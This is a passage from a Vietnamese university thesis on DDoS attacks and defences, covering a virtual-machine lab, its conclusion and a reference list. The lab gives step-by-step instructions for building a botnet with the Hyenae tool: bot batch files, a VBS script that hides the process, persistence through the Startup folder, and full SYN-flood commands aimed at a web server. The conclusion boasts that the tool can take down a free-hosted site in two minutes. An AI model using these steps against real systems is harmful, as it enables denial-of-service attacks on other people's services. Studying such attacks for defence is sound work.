Nh 3.2: cài đặt Clone máy trạm

Một phần của tài liệu Nghiên cứu các hình thức tấn công mạng DDOS và phương pháp phòng chống study the patterns of networkl attacks and DDOS mitigation methods (Trang 68)

Bƣớc 6: Chọn tên Máy ảo và Thƣ mục chạy máy ảo. Đối với máy C&C: Đặt tên là C&C

Đối với máy trạm Botnet: Đặt tên là BOTNET01, BOTNET02, BOTNET03, Backtrack5r3….

69

H nh 3.3: Đặt tên cho các máy trạm

Chọn Finish và đợi hệ thống Clone

3.3.2. Khởi động máy chủ Webserver và thiết lập cấu h nh

Khởi động máy chủ Web Server:

H nh 3.4:Cấu hình máy chủ WebServer

70

H nh .5: Thiết lập các cấu hình cho Webserver

Sau khi khởi động xong, Đặt địa chỉ ip cho máy chủ nhƣ sau:

H nh 3.6: Cài đặt địa chỉ IP cho máy chủ

71

H nh .7: Thiết lập thông số cho XAMPP

Giao diện chạy dịch vụ Apache

H nh .8: Giao diện khi chạy Apache

72

H nh .9: Kiểm tra dịch vụ Webserver 3.3.3 Khởi động máy chủ Botnet

Đảm bảo cấu hình card mạng phải để ở chế độ Bridged

73

Đặt ip cho máy BOTNET01 nhƣ sau

H nh 3.11: Đạt IP cho BOTNET01

Các máy khác có thể đặt thêm nhƣ BOTNET02 192.168.1.102, BOTNET03 192.168.1.103….

Tạo Bot lắng nghe trên cổng 666

Trong thƣ mục C:\Program Files\Hyenae chọn new  text Document

74

Nội dung file điền nhƣ sau:

hyenaed.exe -I 1 -u 10000

Save file và đổi tên file thành Botnet.bat. Lƣu ý trƣớc khi đổi bỏ chọn Hide extensions for known file types

H nh 3.13: Cách tạo file Botnet.Bat

H nh 3.14: Giao diện sau khi tạo file Botnet.Bat

75

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Save và đổi tên file thành invisible.vbs

H nh 3.15: Giao diện sau khi tạo file Invisible.vbs

Tiếp tục tạo 01 file text mới với nội dung nhƣ sau:

wscript.exe "C:\Program Files\Hyenae\invisible.vbs" "C:\Program Files\Hyenae\Botnet.bat"

Save lại và đổi tên file thành Botnetstartup.bat

H nh 3.16: Giao diện sau khi tạo file Botnetstartup.bat

76

H nh 3.17: Tạo shortcut cho file Botnetstartup.bat

Copy file shortcut vào thƣ mục C:\Documents and Settings\All Users\Start Menu\Programs\Startup ( Nhằm mục đích mỗi khi máy tính khởi động lại file này

sẽ tự chạy. Sẽ chạy ẩn tiến trình)

H nh 3.18: Đƣờng dẫn cho file Botnetstartup.bat

Chạy file Botnetstartup.bat nếu chƣa đƣợc chạy (Sau này mỗi lần khởi động lại máy trạm sẽ không cần chạy file này nữa). Kiểm tra xem tiến trình có chạy không? Đảm bảo có tiến trình Hyenaed.exe là ok.

77

H nh 3.19: Kiểm tra cấu hình file Hyenaed.exe trong cmd.exe

Vậy là xong phần setup máy BOTNET. GIờ đến phần C&C Server.

Nếu muốn thêm máy BOTNET khác có thể Clone luôn từ máy này. Làm tƣơng tự các bƣớc nhƣ trên để tạo thêm máy BOTNET.

3.3.4. Khởi động máy chủ C&C Server và thực hiện tấn công

Khởi động máy chủ C&C Server

Xác định địa chỉ MAC của Gateway (là Interface E0/0 trên Firewall).

78

Điều khiển tấn công máy chủ webserver từ máy chủ C&C Server

H nh : Giao diện máy C&C

Vào start run cmd gõ lệnh sau:

hyenae.exe -r 192.168.1.101@666 -A 4 -a tcp -s %-%@80 -d 00:ab:cd:92:52:00-192.168.88.128@80 -f S -t 128 -k 0 -w 0 -q 0 -Q 1 Trong đó 00:ab:cd:92:52:00 là địa chỉ MAC của Gateway

192.168.1.101 là địa chỉ IP của máy BOTNET01

Để điều khiển máy BOTNET02 với IP 192.168.1.102 ta vào cmd gõ lệnh sau: hyenae.exe -r 192.168.1.102@666 -A 4 -a tcp -s %-%@80 -d 00:ab:cd:92:52:00-192.168.88.128@80 -f S -t 128 -k 0 -w 0 -q 0 -Q 1 Để điều khiển máy BOTNET03 với IP 192.168.1.103 ta vào cmd gõ lệnh sau:

hyenae.exe -r 192.168.1.103@666 -A 4 -a tcp -s %-%@80 -d 00:ab:cd:92:52:00-192.168.88.128@80 -f S -t 128 -k 0 -w 0 -q 0 -Q 1

79

H nh : Giao diện C&C khi đặt lệnh tấn công

 Trƣớc Khi tấn công DDoS xảy ra: DU meter bắt đƣợc lƣợng tin:

H nh : Trƣớc khi tấn công DDoS xảy ra

 Khi tấn công DDoS xảy ra:

Vào cái Tool HyenaeFE rồi chọn nút Excute : nhƣ vậy đã bắt đầu thực thiện các cuộc tấn công Botnet.

Khi bị tấn công mình kiểm tra xem wireshark nó sẽ bắt đƣợc gói tin đã gửi tới Server và trang webserver sẽ khó vào và thậm chí mất kết nối.

80

H nh : Wireshark bắt gói tin trong khi tấn công DDoS xảy ra

DU meter đã bắt được các lượng tin khá nhiều.

81

 Sau khi tấn công DDoS xảy ra: Vào trang Web sẽ chậm đi có lúc đƣợc có lúc không. Trang web đã bị mất kết nối tới server:

H nh : Trang web bị mất kết nối

DU Meter bắt đƣợc lƣợng tin:

82

Wireshark bắt đƣợc đúng 10 gói SYN gửi đến Webserver

H nh 3.28: Wireshark bắt đƣợc 10 gói SYN

Truy cập vào web không còn

83

KẾT LUẬN VÀ HƢỚNG PHÁT TRIỂN

Tấn công từ chối dịch vụ phân tán đã phát triển đáng lo ngại trong những năm gần đây và là mối đe dọa thƣờng trực với hệ thống mạng của các cơ quan chính phủ và các doanh nghiệp. Nhiều cuộc tấn công DDoS với quy mô rất lớn đã đƣợc thực hiện gây tê liệt hệ thống mạng của Chính phủ Hàn Quốc và gây ngắt quãng hoạt động của các mạng dịch vụ trực truyến nổi tiếng nhƣ Yahoo. Tấn công DDoS rất khó phòng chống hiệu quả do quy mô rất lớn và bản chất phân tán của nó.

Nhiều kỹ thuật và công cụ tấn công DDoS phức tạp đã đƣợc phát triển, trong đó hỗ trợ đắc lực nhất cho tấn công DDoS là sự phát triển nhanh chóng của các kỹ thuật lây nhiễm các phần mềm độc hại, xây dựng hệ thống mạng máy tính ma (zombie, botnets). Tin tặc có thể chiếm quyền điều khiển các máy tính có kết nối Internet, điểu khiển mạng botnet với hàng trăm ngàn máy tính để thực hiện tấn công DDoS. Để có giải pháp toàn diện phòng chống tấn công DDoS hiệu quả, việc nghiên cứu về các dạng tấn công DDoS là khâu cần thực hiện đầu tiên. Tấn công từ chối dịch vụ phân tán là dạng tấn công mạng nguy hiểm, hiện chƣa có giải pháp tổng quát cụ thể nào để phòng chống tấn công DDoS do tính phức tạp tinh vi của chúng. Tùy vào tình huống kẻ tấn công thực hiện để lên phƣơng án phòng chống, kiểm tra xem chúng đánh vào tầng nào (TCP, Application,..), đánh theo cơ chế nào từ đó xem hệ thống chúng ta có lỗ hổng gì không, chắc chắn sẽ có cách thích hợp để xử lý chúng.

Trong khóa luận này tác giả đã giới thiệu tổng quan và phân loại các cuộc tấn công DDoS hiện nay. Bên cạnh đó tác giả cũng đã giới thiệu về các phƣơng thức, công cụ tấn công DDoS, các bƣớc xây dựng mạng Botnet; Các thuật toán phát hiện DDoS đƣợc sử dụng phổ biến trên thế giới. Những thuật toán này có thể giúp phát triển những hệ thống dựa trên những nền tảng đã có. Nhƣ trong khóa luận này, tác giả đã sử dụng phần mềm giả định Backtracks 5r3 – Vmware workstation, phần mềm Hyenaed để mô phỏng các cuộc tấn công DDoS và sử dụng thuật toán CUSUM để phát hiện dấu hiệu của cuộc tấn công DDos; Và các phƣơng thức phòng chống DDoS. Trên cơ sở đó có thể có đánh giá đúng về khả năng bị tấn công và lựa

84

chọn tập các biện pháp phòng ngừa, phát hiện và giảm thiểu tấn công một cách hiệu quả.

Những kết quả đạt đƣợc

+ Tìm hiểu khá chi tiết, tổng quan về các khía cạnh nền tảng công nghệ DDoS nhƣ bản chất khái niệm, các thách thức và yêu cầu, ứng dụng, mô hình kiến trúc, các chuẩn hiện nay.

+ Xây dựng đƣợc ứng dụng demo cho công cụ DDoS trên nền tảng Hyenaed, Backtrack5r3, SYN Flood

+ Công cụ rất mạnh, có thể làm sập 1 webside dùng host FREE trong vòng 2 phút.

+ Xây dựng đƣợc Firewall phòng chống DDoS đơn giản, dùng ASA.

Những vấn đề tồn tại

+ Chƣơng trình cần hoàn thiện hơn.

+ Đây chỉ là demo nhỏ minh họa cho cơ chế SYN Flood, TCP, UDP. + Cần có chƣơng trình trung gian thứ 3 để tìm các cổng mở trên máy đích.

Hƣớng phát triển

Tuy nhiên do thời gian có hạn nên hệ thống còn khá nhiều vấn đề chƣa đƣợc giải quyết. Ví dụ nhƣ: có thể tính các địa chỉ IP mới một cách chi tiết hơn nữa để hạn chế tối đa việc chặn nhầm; Xây dựng quét các cổng mở cho ứng dụng.; Thiết kế cho một ứng dụng tấn công mạnh mẽ hơn; Thiết kế để có thể tấn công các Server lớn hơn … Hy vọng trong một tƣơng lai không xa hệ thống sẽ đƣợc phát triển và hoàn thiện hơn để có thể ứng dụng trong thực tế.

85

TÀI LIỆU THAM KHẢO

1. B. E. Brodsky and B. S. Darkhovsky (1993), Nonparametric Methods in Change-point Problems, Kluwer Academic Publishers, pp. 78-90.

2. Christos Douligeris and Aikaterini Mitrokotsa (2003), DDoS Attacks And Defense Mechanisms: A Classification, Signal Processing and Information Technology.

3. Jelena Mirkovic, Janice Martin and Peter Reiher (2004), A Taxonomy of DDoS Attacks and DDoS Defense Mechanisms, ACM SIGCOMM Computer Communication Review.

4. Jameel Hashmi, Manish Saxena, and Rajesh Saini (2012), Classification of DDoS Attacks and their Defense Techniques using Intrusion Prevention System,

International Journal of Computer Science & Communication Networks.

5. Jelena Mikovic, G.Prier and P.Reiher (2002), Attacking DdoS at the source, Proceedings of ICNP.

6. Jelena Mikovic, G.Prier and P.Reiher (2002), A Taxonomy of DdoS Attacks and DdoS Defense Mechanisms , UCLA CSD Technical Report

no. 020018.

7. Jelena Mikovic, G.Prier and P.Reiher (2002), Source Router Approach to DdoS Defense – UCLA CSD Technical Report no. 010042.

8. Kanwal Garg, Rshma Chawla (2011), Detection Of DDoS Attacks Using Data Mining, International Journal of Computing and Business Research.

9. K.Park and H. Lee.(2001), On the Effectiveness of Route-Based Packet Filtering for Distributed DoS Attack Prevention in Power-Law Internets.

In Proceedings of ACM SIGCOMM.

10. Mbabazi Ruth Reg. No (2005), Victim-based defense against IP packet flooding denial of service attacks.

11. Monowar H. Bhuyan, H. J. Kashyap, D. K. Bhattacharyya and J. K. Kalita (2013), Detecting Distributed Denial of Service Attacks: Methods, Tools and

86

Future Directions, The Computer Journal.

12. Mohammed Alenezi (2012), Methodologies for detecting DoS/DDoS attacks against network servers, The Seventh International Conference on Systems and

Networks Communications - ICSNC.

13. Rajkumar, Manisha Jitendra Nene (2013), A Survey on Latest DoS Attacks Classification and Defense Mechanisms, International Journal of Innovative Research in Computer and Communication Engineering.

14. Saman Taghavi Zargar, James Joshi, Member and David Tippe (2013), A Survey of Defense Mechanisms Against Distributed Denial of Service (DDoS) Flooding Attacks, IEEE Communications Surveys & Tutorials.

15. Tao Peng Christopher Leckie Kotagiri Ramamohanarao (2011), Protection from Distributed Denial of Service Attack, Using History-based IP Filtering

16. Thwe Thwe Oo, Thandar Phyu (2013), A Statistical Approach to Classify and Identify DDoS Attacks using UCLA Dataset, International Journal of Advanced

Research in Computer Engineering & Technology.

17. Tony Scheid (2011), DDoS Detection and Mitigation Best Practices, Arbor Networks.

18. T. Peng, C. Leckie, and K. Ramamohanarao (2003), Detecting distributed denial of service attacks, using source ip address monitoring.

Một phần của tài liệu Nghiên cứu các hình thức tấn công mạng DDOS và phương pháp phòng chống study the patterns of networkl attacks and DDOS mitigation methods (Trang 68)

Tải bản đầy đủ (PDF)

(86 trang)